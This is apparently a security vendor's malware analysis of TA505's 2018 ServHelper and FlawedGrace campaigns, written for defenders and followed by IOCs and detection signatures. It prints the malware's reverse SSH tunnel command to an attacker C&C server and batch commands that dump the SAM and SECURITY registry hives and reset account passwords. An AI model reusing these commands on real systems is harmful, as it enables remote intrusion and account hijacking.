Overview
For much of 2018, we observed threat actors increasingly distributing downloaders, backdoors, information stealers, remote access Trojans (RATs), and more as they abandoned ransomware as their primary payload. In November 2018, TA505, a prolific actor that has been at the forefront of this trend, began distributing a new backdoor we named “ServHelper”. ServHelper has two variants: one focused on remote desktop functions and a second that primarily functions as a downloader. Additionally we have observed the downloader variant download a malware we call “FlawedGrace.” FlawedGrace is a full-featured RAT that we first observed in November 2017. TA505 appears to be actively targeting banks, retail businesses, and restaurants as they distribute these malware families. This targeting falls in line with other activity we reported earlier in 2018.[1] [2]
Campaign Analysis
November 9 “Tunnel” Campaign
On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call “ServHelper” based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the “tunnel” variant of ServHelper, described in the “Malware Analysis” section.
Figure 1: Example email message from the November 9 “tunnel” campaign
November 15 “Downloader” Campaign
On November 15, 2018, we saw a similar, but larger campaign (tens of thousands of messages) from the same actor. In addition to financial institutions, this campaign also targeted the retail industry. The messages (Figure 2) contained Microsoft “.doc”, “.pub”, or “.wiz” attachments. The documents contained macros that, when enabled, downloaded and executed the ServHelper malware. This campaign used the “downloader” variant of ServHelper with the tunneling functionality removed.
Figure 2: Example email message from the November 15 “downloader” campaign
December 13 “FlawedGrace” Campaign
On December 13, 2018, we observed another large ServHelper “downloader” campaign targeting retail and financial services customers. The messages used a mixture of Microsoft Word attachments with embedded malicious macros, PDF attachments with URLs linking to a fake “Adobe PDF Plugin” webpage linking to the malware (Figure 3), and direct URLs in the email body linking to a ServHelper executable.
Figure 3: Example PDF attachment containing a URL linking to the fake “Adobe PDF Plugin” page
In this campaign, we observed ServHelper download (Figure 4) and execute an additional malware that we call “FlawedGrace.” FlawedGrace is a robust remote access trojan (RAT) that we initially encountered in November 2017, but have rarely observed since.
Figure 4: Fiddler screenshot showing ServHelper downloading FlawedGrace
ServHelper Malware Analysis
ServHelper is a new malware family -- best classified as a backdoor -- that we first observed in the wild in November 2018. Its name is based on a filename (ServHelper.dll) that we noted in the November 9 “tunnel” campaign described above. A sample from a later campaign used command and control (C&C) URIs containing “/rest/serv.php” which also reference a “serv” component.
The malware is written in Delphi and at the time of this writing is being actively developed. New commands and functionality are being added to the malware in almost every new campaign so we will not focus on one specific sample for this analysis. Rather, we will discuss the malware family generally; see the “Indicators of Compromise” section below for specific reference samples.
As noted, there are two distinct variants of ServHelper: a “tunnel” variant and a “downloader” variant. The “tunnel” variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to “hijack” legitimate user accounts or their web browser profiles and use them as they see fit. The “downloader” variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.
Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5.
Figure 5: Example of ServHelper’s initial phone home
Early versions of the malware used a semi-random URI such as: “/ghuae/huadh.php”. Newer versions have started using more typical URIs such as:
- /support/form.php
- /rest/serv.php
- /sav/s.php
Most of the C&C domains that we have observed have been in the “.pw” top-level domain (TLD) such as:
- checksolutions[.]pw
- afgdhjkrm[.]pw
- pointsoft[.]pw
- dedoshop[.]pw
However, recently the developer has added support for “.bit” C&C domains; this TLD is associated with the cryptocurrency Namecoin and requires special DNS servers that the malware uses:
- dedsolutions[.]bit
- arepos[.]bit
The POST data in these C&C communications contains three URL-encoded parameters: “key”, “sysid”, and “resp”. The “key” parameter is a hardcoded string in the malware that does not appear to be used elsewhere in the code. Examples of observed keys include:
- Gsiss744@sd
- asdgdgYss455
- #567sisGdsa
The “sysid” parameter contains a campaign ID in newer versions of the malware, the Windows version running on the infected machine, system architecture, username, and a random integer. Examples of observed campaign IDs include:
- clean12
- chistka12.17
- noP_19
- nonRDP
- no24
- ny_upd
The “resp” parameter contains responses to commands received from the controller.
An example command sent from the C&C server to the infected machine can be seen in the Fiddler screenshot in Figure 4 above. It contains a command, carrot (“^”) delimiter, and command arguments. We observed the following commands in the malware:
nop
Implements a keep-alive type of functionality. The infected machine responds to the C&C server with a “nop ok” message.
tun (“tunnel” variant only)
Sets up a reverse SSH tunnel connecting the C&C server to the infected system’s RDP port (3389). In earlier versions, a loader component performed the initial setup for this and other commands by:
- Extracting and dropping an OpenSSH binary from its PE resources
- Extracting, dropping, and configuring the RDP Wrapper Library software from its PE resources
- Creating a new user “supportaccount” with a password of “Ghar4f5”
- Adding this user to the “Remote Desktop Users” and “Administrators” groups
In more recent versions, this functionality of the loader component was integrated into the core ServHelper code, using built-in Windows remote desktop support instead of a third-party software package. This command sets up a reverse SSH tunnel by executing the dropped OpenSSH binary with the following command line arguments:
-N -R <remote port>:localhost:3389 tunnel@<C&C server>
Once configured, ServHelper sends a “tun ok\r\nport:<remote port> tun pid:<SSH process id>” to the C&C server.
slp
Sets a sleep timeout.
fox (“tunnel” variant only)
Copies a Firefox web browser profile from one user to another. Earlier versions used the Windows “xcopy” command. Later versions download a self-extracting RAR file from the C&C server (/cp/cp.exe) and decompress it using the password “123”. One of the files in this archive is a piece of software known as "Runtime's Shadow Copy" and it is used to copy the web browser profiles.
chrome (“tunnel” variant only)
Similar to the “fox” command but for Chrome web browser profiles.
killtun (“tunnel” variant only)
Kills an SSH tunnel process associated with a particular remote port. Once killed, it sends a “killtun ok” message to the C&C server.
tunlist (“tunnel” variant only)
Gets a list of all active SSH tunnels and responds to the C&C server with a message containing “active tun: <remote port>” entries for each active tunnel.
killalltuns (“tunnel” variant only)
Kills all SSH tunnel processes.
shell
Executes a shell command and sends the response to the C&C server.
load
Downloads and runs an executable from a specified URL. Responds to the C&C server with either “load no param ok” or “load param ok” depending if any command-line arguments were passed to the downloaded executable.
socks (“tunnel” variant only)
Similar to the “tun” command, but allows a reverse SSH tunnel to be built between the C&C server to any server/port (as specified by the command argument) through the infected system. Once configured, a “socks ok\r\nport:<remote port> tun pid:<SSH process id>” message is sent to the C&C server.
selfkill
Removes the malware from the infected machine.
loaddll (“downloader” variant only)
A newer command that has only been observed in the “downloader” variant. Similar to the “load” command, but for DLLs.
bk (“tunnel” variant only)
A newer command similar to the “tun” command. “bk” allows the reverse SSH tunnel to be set up using a C&C specified remote host instead of the hardcoded C&C server.
hijack (“tunnel” variant only)
A newer command that appears to hijack a user account with a known password (“123”). It does so by creating and scheduling a task “test” to run a batch file containing the following commands:
- reg export hklm\sam c:\sam.reg
- reg export hklm\security c:\sec.reg
- net user <command argument username> 123
It then schedules a task “test2” to run another batch file containing the following commands:
- schtasks /delete /tn "test" /F
- reg import c:\sam.reg
- reg import c:\sec.reg
- schtasks /delete /tn "test2" /F
Finally it runs the first scheduled task ands send a “ready! try to login with pass 123” message to the C&C server.
forcekill (“tunnel” variant only)
A newer command that is similar to the “killalltuns” but uses the Windows “taskkill” command.
sethijack (“tunnel” variant only)
A newer command that controls an “alerting” mechanism. A separate program thread monitors user logons. When a legitimate user becomes active and the threat actor is connected to the infected system using the previously created “supportaccount” account, it runs the “chrome” and “fox” commands, copying the legitimate user’s web browser profiles to the “supportaccount” user. It then alerts the threat actor by sending message boxes containing “login detected, begin hijacking” and “profiles hijacked!” messages. These are sent by a “msg.exe” program contained in the “cp.exe” archive discussed in the “fox” command above.
chromeport (“tunnel” variant only)
A newer command that implements the same functionality as the “chrome” command.
During some of the ServHelper “downloader” campaigns, we observed commands (e.g., as shown in Figure 4 above) instructing the malware to download and execute another malware we call “FlawedGrace”.
FlawedGrace Malware Analysis
FlawedGrace is a remote access trojan (RAT) named after debugging artifacts (class names) left in the analyzed sample (see Figure 6).
Figure 6: “Grace” class names shown by IDA Pro
The malware is written in C++. It is a very large program and makes extensive use of object-oriented and multithreaded programming techniques. This makes reverse engineering and debugging the malware both difficult and time consuming. The coding style and techniques suggest that FlawedGrace was not written by the same developer as ServHelper.
We initially observed FlawedGrace in an email campaign as early as November 2017, but until the recent ServHelper campaigns, we had not observed it being actively distributed again. The malware usually contains a debug string including a “version number” and “build date” distinct from the PE compile timestamp, allowing searches of various malware repositories to find additional versions:
- Unknown version number built at “Aug 7 2017 22:28:47”
- Version 2.0.7 built at “Oct 18 2017 04:18:39”
- Version 2.0.8 built at “Oct 26 2017 12:05:44”
- Version 2.0.9 built at “Nov 4 2017 22:28:10”
- Version 2.0.10 built at “Nov 20 2017 10:53:33”
- Version 2.0.11 built at “Dec 16 2017 08:02:46”
Per the malware’s debug strings, significant development took place during the end of 2017. The ServHelper campaigns were distributing version 2.0.10 of the malware.
FlawedGrace creates, encrypts, and stores a configuration file containing the C&C IPs and ports in a “<hex digits>.dat” file (e.g., “C:\ProgramData\21851a60.dat”). The first 16 bytes of the file are an AES initialization vector (IV). The rest of the data is AES-encrypted in CBC mode. In the analyzed sample, the AES key was hardcoded as “c3oeCSIfx0J6UtcV”. Once decrypted, the configuration data is stored as a custom serialization (Figure 7). Early versions of the malware used the class names “GraceParams” and “GraceValue” when interacting with this part of the code, so it is likely that the serialization was designed and developed by the malware developer and not a standard format.
Figure 7: Plaintext configuration file showing C&C IP and port
FlawedGrace uses a complicated binary protocol for its command and control. It can use a configurable port for communications, but all samples we have observed to date have used port 443. Figure 8 shows an example of the first four messages between an infected system and C&C server.
Figure 8: FlawedGrace’s initial C&C communications.
We are still reverse engineering and documenting the protocol, but we can provide an overview of the initial C&C communications below:
Message 1
Initial beacon from infected system. It is a 14-byte binary structure that contains at least the following parts:
- Offset 0x0: CRC32 hash of remaining data (DWORD)
- Offset 0x4: magic bytes "GCRG" (DWORD)
Message 2
Key verification message from infected system. We believe that this is used to verify that one of the encryption keys (static key) is the same on both the malware and C&C server. It is a 52-byte binary structure that contains the following analyzed offsets, among other components still under analysis:
- Offset 0x0: CRC32 hash of remaining data (DWORD)
- Offset 0x14: MD5 hash of the following pieces (16 bytes)
- A static key which has always been “static pass” in the samples analyzed
- The random bytes at offset 0x24 that have been hex encoded and uppercased
- Offset 0x24: random bytes (16 bytes)
Message 3
Key exchange message from C&C server. This message delivers a second encryption key (dynamic key) used for further data transfers. It is a 42-byte structure that contains the following analyzed offsets, among other components still under analysis:
- Offset 0x0: CRC32 hash of remaining data (DWORD)
- Offset 0x1a: dynamic key (16 bytes)
Message 4
An example of data transfer between infected system and C&C server. It starts with a 38-byte binary header that contains the following analyzed offsets, among other components still under analysis:
- Offset 0x0: CRC32 hash of the next 10 bytes (DWORD)
- Offset 0xE: AES IV (16 bytes)
Following the header is the data that has been AES-encrypted in CBC mode. The AES key is generated using the “static key” and the “dynamic key” from messages 3 and 4 above. An example of key generation in Python appears in Figure 9.
Figure 9: Example FlawedGrace C&C data transfer encryption key generation in Python
Figure 10 shows an example of the plaintext data transferred in message 4.
Figure 10: Example FlawedGrace C&C message 4 plaintext data
This message contains various system and malware information that has been serialized using the same method as for configuration files. The serialized data is then packaged within additional binary data structures.
While there are other message types with their own formats, the examples here provide initial insight into FlawedGrace’s C&C protocol.
FlawedGrace also uses a series of commands, provided below for reference:
- target_remove
- target_update
- target_reboot
- target_module_load
- target_module_load_external
- target_module_unload
- target_download
- target_upload
- target_rdp
- target_passwords
- target_servers
- target_script
- destroy_os
- desktop_stat
Conclusion
Threat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or like Locky ransomware it may become the dominant strain of malware in the wild. In this case, the group has started distributing two variants on a new backdoor we named ServHelper and a RAT we call FlawedGrace. This also extends the trend that emerged in 2018, in which threat actors increasingly focused on distribution of downloaders, information stealers, RATS, and other malware that can remain resident on victim devices for far longer than destructive, “smash and grab” malware like ransomware. We will continue to observe the distribution of these three malware variants but, at this time, they do not appear to be one-offs, but rather long-term investments by TA505.
References
[2] https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware
Indicators of Compromise (IOCs)
|
IOC |
IOC Type |
Description |
|
52c72a9de2f6e892f07827add85ad913b0541cd5c8449aadc2722f8eb75e548c |
SHA256 |
November 9 “Tunnel” campaign attachment |
|
hxxp://officemysuppbox[.]com/staterepository |
URL |
November 9 “Tunnel” campaign payload |
|
1b0859ddbdebcb9d2bb46de00d73aa21bc617614b8123054426556783b211bc8 |
SHA256 |
November 9 “Tunnel” campaign ServHelper |
|
hxxps://checksolutions[.]pw/ghuae/huadh.php |
URL |
November 9 “Tunnel” campaign ServHelper C&C |
|
hxxps://rgoianrdfa[.]pw/ghuae/huadh.php |
URL |
November 9 “Tunnel” campaign ServHelper C&C |
|
hxxps://arhidsfderm[.]pw/ghuae/huadh.php |
URL |
November 9 “Tunnel” campaign ServHelper C&C |
|
|
|
|
|
eb66ebb95a3dcecae64c61f611a9332fbf460d1b8039d3ab7e4f220104a4bec4 |
SHA256 |
November 15 “Downloader” campaign attachment |
|
hxxp://offficebox[.]com/host32 |
URL |
November 15 “Downloader” campaign payload |
|
3cd7e0a8321259e8446b2a9da775aae674715c74ff4923cfc8ec5102f380d41a |
SHA256 |
November 15 “Downloader” campaign ServHelper |
|
|
|
|
|
f4b9219f329803dd45afd5646351de456e608dd946830c961ec66c6c25e52cac |
SHA256 |
December 13 “FlawedGrace” campaign attachment |
|
hxxp://office365onlinehome[.]com/host32
|
URL |
December 13 “FlawedGrace” campaign payload |
|
d56429d6d0222022fe8f4cb35a28cd4fb83f87b666a186eb54d9785f01bb4b58 |
SHA256 |
December 13 “FlawedGrace” campaign ServHelper |
|
hxxps://afgdhjkrm[.]pw/aggdst/Hasrt.php |
URL |
December 13 “FlawedGrace” campaign ServHelper C&C |
|
efcee275d23b6e71589452b1cb3095ff92b10ab68cd07957b2ad6be587647b74 |
SHA256 |
December 13 “FlawedGrace” campaign FlawedGrace |
|
46.161.27[.]241:443 |
IP:Port |
December 13 “FlawedGrace” campaign FlawedGrace C&C |
|
|
|
|
|
9fccd107bd0aee3a2f39ad76a49758309c95545d8154b808eec24d2b51dc4579 |
SHA256 |
“sethijack” command ServHelper |
|
hxxp://dedsolutions[.]bit/sav/s.php |
URL |
“sethijack” command ServHelper C&C |
|
hxxp://dedoshop[.]pw/sav/s.php |
URL |
“sethijack” command ServHelper C&C |
|
hxxp://asgaage[.]pw/sav/s.php |
URL |
“sethijack” command ServHelper C&C |
|
hxxp://sghee[.]pw/sav/s.php |
URL |
“sethijack” command ServHelper C&C |
|
a9492312f1258567c3633ed077990fe053776cd576aa60ac7589c6bd7829d549 |
SHA256 |
“loaddll” command ServHelper |
|
hxxps://vesecase[.]com/support/form.php |
URL |
“loaddll” command ServHelper C&C |
ET and ETPRO Suricata/Snort Signatures
2833522 ETPRO TROJAN Observed Malicious SSL Cert (HuadhServHelper RAT CnC)
2833552 ETPRO TROJAN HuadhServHelper RAT CnC Domain Observed in SNI
2833881 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)
2833985 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)
2834074 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)
2834233 ETPRO TROJAN ServHelper CnC Inital Checkin
2828489 ETPRO TROJAN FlawedGrace CnC Activity